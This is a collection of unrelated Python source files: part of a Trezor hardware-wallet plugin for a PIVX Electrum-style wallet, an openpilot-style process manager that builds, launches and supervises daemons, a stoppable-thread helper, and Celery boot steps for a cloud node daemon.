return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
msg_sig = client.sign_message(address_path, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None:
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorInitSettings(NamedTuple):
word_count: int
label: str
pin_enabled: bool
passphrase_enabled: bool
recovery_type: Any = None
no_backup: bool = False
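# Construction sketch (illustrative, not part of the plugin): the wizard is
# expected to build one of these from the user's choices, e.g.
#   TrezorInitSettings(word_count=12, label='my device', pin_enabled=True,
#                      passphrase_enabled=False, recovery_type=None)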
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 11, 0)
maximum_library = (0, 12)
SUPPORTED_XTYPES = ('standard', )
DEVICE_IDS = (TREZOR_PRODUCT_KEY,)
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import trezorlib
try:
version = trezorlib.__version__
except Exception:
version = 'unknown'
if TREZORLIB:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
def enumerate(self):
devices = trezorlib.transport.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key=TREZOR_PRODUCT_KEY,
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = trezorlib.transport.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
# note that this call can still raise!
return TrezorClientBase(transport, handler, self)
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "PIVX Testnet" if constants.net.TESTNET else "PIVX"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, device_id)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.daemon = True
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings: TrezorInitSettings, method, device_id, wizard, handler):
if method == TIM_RECOVER and settings.recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength_from_word_count = {12: 128, 18: 192, 24: 256}
client.reset_device(
strength=strength_from_word_count[settings.word_count],
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label,
no_backup=settings.no_backup)
elif method == TIM_RECOVER:
client.recover_device(
recovery_type=settings.recovery_type,
word_count=settings.word_count,
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label)
if settings.recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
else:
raise RuntimeError("Unsupported recovery method")
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
if not client.is_uptodate():
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
raise UserFacingException(msg)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
is_creating_wallet = purpose == HWD_SETUP_NEW_WALLET
client.get_xpub('m', 'standard', creating=is_creating_wallet)
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
prev_tx = { bfh(txhash): self.electrum_tx_to_txtype(tx, xpub_path) for txhash, tx in prev_tx.items() }
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, xpub_path, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
details = SignTx(lock_time=tx.locktime, version=tx.version)
signatures, _ = client.sign_tx(self.get_coin_name(), inputs, outputs, details=details, prev_txes=prev_tx)
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for _, xpub in sorted_pairs])
else:
multisig = None
client = self.get_client(keystore)
client.show_address(address_path, script_type, multisig)
def tx_inputs(self, tx, xpub_path, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
xpubs = [parse_xpubkey(x) for x in x_pubkeys]
multisig = self._make_multisig(txin.get('num_sig'), xpubs, txin.get('signatures'))
script_type = self.get_trezor_input_script_type(txin['type'])
txinputtype = TxInputType(
script_type=script_type,
multisig=multisig)
# find which key is mine
for xpub, deriv in xpubs:
if xpub in xpub_path:
xpub_n = parse_path(xpub_path[xpub])
txinputtype.address_n = xpub_n + deriv
break
prev_hash = bfh(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs, signatures=None):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
if signatures is None:
signatures = [b''] * len(pubkeys)
elif len(signatures) != len(pubkeys):
raise RuntimeError('Mismatched number of signatures')
else:
signatures = [bfh(x)[:-1] if x else b'' for x in signatures]
return MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=signatures,
m=m)
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(info.script_type)
deriv = parse_path("/%d/%d" % index)
multisig = self._make_multisig(m, [(xpub, deriv) for xpub in xpubs])
txoutputtype = TxOutputType(
multisig=multisig,
amount=amount,
address_n=parse_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx, xpub_path):
t = TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
t.inputs = self.tx_inputs(tx, xpub_path)
t.bin_outputs = [
TxOutputBinType(amount=vout['value'], script_pubkey=bfh(vout['scriptPubKey']))
for vout in d['outputs']
]
return t
|
manager.py
|
#!/usr/bin/env python3.7
import os
import time
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import datetime
from common.basedir import BASEDIR, PARAMS
from common.android import ANDROID
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
TOTAL_SCONS_NODES = 1195
prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
if ANDROID:
os.chmod("/dev/shm", 0o777)
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
os._exit(os.wait()[1])
if __name__ == "__main__":
unblock_stdout()
from common.spinner import Spinner
else:
from common.spinner import FakeSpinner as Spinner
import importlib
import traceback
from multiprocessing import Process
# Run scons
spinner = Spinner()
spinner.update("0")
if not prebuilt:
for retry in [True, False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else "-j%d" % (nproc - 1)
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline()
if not line:  # readline returns b'' at EOF; it never returns None
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
if spinner is not None:
spinner.update("%d" % (50.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
print(line.decode('utf8'))
except Exception:
pass
if scons.returncode != 0:
if retry:
print("scons build failed, cleaning in")
for i in range(3,-1,-1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache")
else:
raise RuntimeError("scons build failed")
else:
break
import cereal
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.swaglog import cloudlog
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from common import android
from common.apk import update_apks, pm_apply_packages, start_frame
ThermalStatus = cereal.log.ThermalData.ThermalStatus
# comment out anything you don't want to run
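# Each entry is either a python module path (launched through launcher() in a
# forked Process) or a (relative_dir, argv) tuple for a native binary
# (launched through nativelauncher()); see start_managed_process() below.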
managed_processes = {
"thermald": "selfdrive.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.controls.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": ("selfdrive/locationd", ["./paramsd"]),
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
# "updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord', 'paramsd']
# processes to end if thermal conditions exceed Green parameters
green_temp_processes = ['uploader']
persistent_processes = [
'thermald',
'logmessaged',
'ui',
'uploader',
]
if ANDROID:
persistent_processes += [
'logcatd',
'tombstoned',
'updated',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'dmonitoringd',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'ubloxd',
'locationd',
]
if ANDROID:
car_started_processes += [
'sensord',
'clocksd',
'gpsd',
'dmonitoringmodeld',
'deleter',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
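# Illustrative use (names below are hypothetical, not part of the stock
# process table): a fork could register its own processes here, e.g.
#   register_managed_process("mydaemon", "selfdrive.mydaemon")
#   register_managed_process("mysensor", ("selfdrive/mysensor", ["./mysensor"]), car_started=True)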
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc],
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")):
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
join_process(running[name], 5)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if ANDROID:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id, dongle_secret = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if ANDROID:
os.chmod(BASEDIR, 0o755)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock('thermal')
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start frame
if ANDROID:
pm_apply_packages('enable')
start_frame()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
logger_dead = False
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
# heavyweight batch processes are gated on favorable thermal conditions
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
for p in green_temp_processes:
if p in persistent_processes:
kill_managed_process(p)
else:
for p in green_temp_processes:
if p in persistent_processes:
start_managed_process(p)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
for p in reversed(car_started_processes):
kill_managed_process(p)
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare(spinner=None):
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# when not prebuilt, the scons progress above already took the spinner to 50, so prepare covers the remaining range
total = 100.0 if prebuilt else 50.0
for i, p in enumerate(managed_processes):
if spinner is not None:
spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),))
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
android.reboot(reason="recovery")
def main():
os.environ['PARAMS_PATH'] = PARAMS
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
# disable bluetooth
os.system('service call bluetooth_manager 8')
params = Params()
params.manager_start()
# set unset params
if params.get("CommunityFeaturesToggle") is None:
params.put("CommunityFeaturesToggle", "0")
if params.get("CompletedTrainingVersion") is None:
params.put("CompletedTrainingVersion", "0")
if params.get("IsMetric") is None:
params.put("IsMetric", "0")
if params.get("RecordFront") is None:
params.put("RecordFront", "0")
if params.get("HasAcceptedTerms") is None:
params.put("HasAcceptedTerms", "0")
if params.get("HasCompletedSetup") is None:
params.put("HasCompletedSetup", "0")
if params.get("IsUploadRawEnabled") is None:
params.put("IsUploadRawEnabled", "1")
if params.get("IsLdwEnabled") is None:
params.put("IsLdwEnabled", "1")
if params.get("IsGeofenceEnabled") is None:
params.put("IsGeofenceEnabled", "-1")
if params.get("SpeedLimitOffset") is None:
params.put("SpeedLimitOffset", "0")
if params.get("LongitudinalControl") is None:
params.put("LongitudinalControl", "0")
if params.get("LimitSetSpeed") is None:
params.put("LimitSetSpeed", "0")
if params.get("LimitSetSpeedNeural") is None:
params.put("LimitSetSpeedNeural", "0")
if params.get("LastUpdateTime") is None:
t = datetime.datetime.now().isoformat()
params.put("LastUpdateTime", t.encode('utf8'))
if params.get("OpenpilotEnabledToggle") is None:
params.put("OpenpilotEnabledToggle", "1")
if params.get("LaneChangeEnabled") is None:
params.put("LaneChangeEnabled", "1")
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if ANDROID:
update_apks()
manager_init()
manager_prepare(spinner)
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
uninstall()
if __name__ == "__main__":
main()
# manual exit because we are forked
sys.exit(0)
|
threading_utilities.py
|
import threading
from data_science.simulation.time import TimeSimulator
class StoppableThread(threading.Thread):
"""
Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition.
"""
def __init__(self, target=None):
if target is None:
super(StoppableThread, self).__init__()
else:
super(StoppableThread, self).__init__(target=target)
self._stop_event = threading.Event()
def stop(self):
"""
Stop the thread.
:param self: self
"""
self._stop_event.set()
def stopped(self):
"""
The stop event was triggered.
:param self: self
"""
return self._stop_event.is_set()
class ThreadableClass():
"""A class providing threading functionality; subclasses override do_something()."""
def __init__(self, update_time=0.5):
self.update_time = update_time
self.time_sim = TimeSimulator()
def do_something(self):
pass
def run(self):
while True:
if self.time_sim.tick(self.update_time):
self.do_something()
if self.thread.stopped():
break
def start(self):
"""
Start the thread.
:param self: self
"""
self.thread = StoppableThread(target=self.run)
self.thread.start()
def stop(self):
"""
Stop the thread.
:param self: self
"""
self.thread.stop()
self.thread.join()
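# Usage sketch (illustrative, not part of the original module), assuming
# TimeSimulator.tick(update_time) returns True roughly once per update_time
# seconds:
#
#   class HeartbeatPrinter(ThreadableClass):
#       def do_something(self):
#           print("tick")
#
#   worker = HeartbeatPrinter(update_time=1.0)
#   worker.start()   # spawns a StoppableThread running worker.run()
#   ...
#   worker.stop()    # sets the stop event; run() exits and the thread is joined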
|
bootsteps.py
|
from __future__ import absolute_import
import os
import json
from subprocess import PIPE, STDOUT
from threading import Thread
from logging import getLogger
from time import sleep
try:
# noinspection PyCompatibility
from Queue import Queue
except ImportError:
# noinspection PyUnresolvedReferences,PyCompatibility
from queue import Queue
from psutil import Popen, NoSuchProcess
from celery.bootsteps import StartStopStep
from frozendict import frozendict
from que import E_SHUTDOWN, Q_MGMT, Q_FAST
logger = getLogger(__name__)
class ESDCDaemon(StartStopStep):
"""
A common boot step for all erigonesd services.
"""
label = 'ESDCDaemon'
requires = ('celery.worker.components:Pool',)
def start(self, parent):
logger.info('Starting %s on %s', self.label, parent.hostname)
def stop(self, parent):
logger.info('Stopping %s on %s', self.label, parent.hostname)
logger.warning('%s is shutting down', parent.hostname)
E_SHUTDOWN.set()
class _PeriodicTaskDaemon(StartStopStep):
"""
An abstract boot step for building a daemon that runs its tasks at a periodic interval.
"""
_stopping = False
_interval = 60
_priority = 10
def __init__(self, parent, **kwargs):
super(_PeriodicTaskDaemon, self).__init__(parent, **kwargs)
self._timer = parent.timer
self._tref = None
self._redis = parent.app.backend.client
self._periodic_tasks = []
def _periodic(self):
for task in self._periodic_tasks:
task()
def start(self, parent):
logger.info('Starting %s on %s', self.label, parent.hostname)
self._tref = self._timer.call_repeatedly(self._interval, self._periodic, priority=self._priority)
def stop(self, parent):
logger.info('Stopping %s on %s', self.label, parent.hostname)
self._stopping = True
if self._tref:
self._tref.cancel()
self._tref = None
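# Subclassing sketch (illustrative): a concrete daemon decides whether it is
# enabled and appends callables to self._periodic_tasks; the timer created in
# start() then calls them every _interval seconds. HeartbeatDaemon below is a
# hypothetical example, not part of erigonesd.
#
#   class HeartbeatDaemon(_PeriodicTaskDaemon):
#       label = 'HeartbeatDaemon'
#       _interval = 30
#
#       def __init__(self, parent, **kwargs):
#           super(HeartbeatDaemon, self).__init__(parent, **kwargs)
#           self.enabled = True
#           self._periodic_tasks.append(lambda: logger.info('still alive'))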
class FastDaemon(_PeriodicTaskDaemon):
"""
Danube Cloud internal fast daemon - runs two threads for monitoring VM status changes.
"""
label = 'FastDaemon'
node_uuid = None
vm_status_queue = None
vm_status_watcher = None
vm_status_dispatcher_thread = None
vm_status_monitor_thread = None
SYSEVENT = ('sysevent', '-j', '-c', 'com.sun:zones:status', 'status')
VM_STATUS = frozendict({
'running': 'running',
'uninitialized': 'stopped'
})
def __init__(self, parent, **kwargs):
hostname = parent.hostname
self._conf = parent.app.conf
self.enabled = self._conf.ERIGONES_FAST_DAEMON_ENABLED and hostname.startswith(Q_FAST + '@')
super(FastDaemon, self).__init__(parent, **kwargs)
if self.enabled:
self._periodic_tasks.append(self._vm_status_thread_check)
def _vm_status_dispatcher(self):
"""THREAD: Reads VM status changes from queue and creates a vm_status_event_cb task for every status change"""
from que.utils import task_id_from_string, send_task_forever # Circular imports
vm_status_task = self._conf.ERIGONES_VM_STATUS_TASK
task_user = self._conf.ERIGONES_TASK_USER
queue = self.vm_status_queue
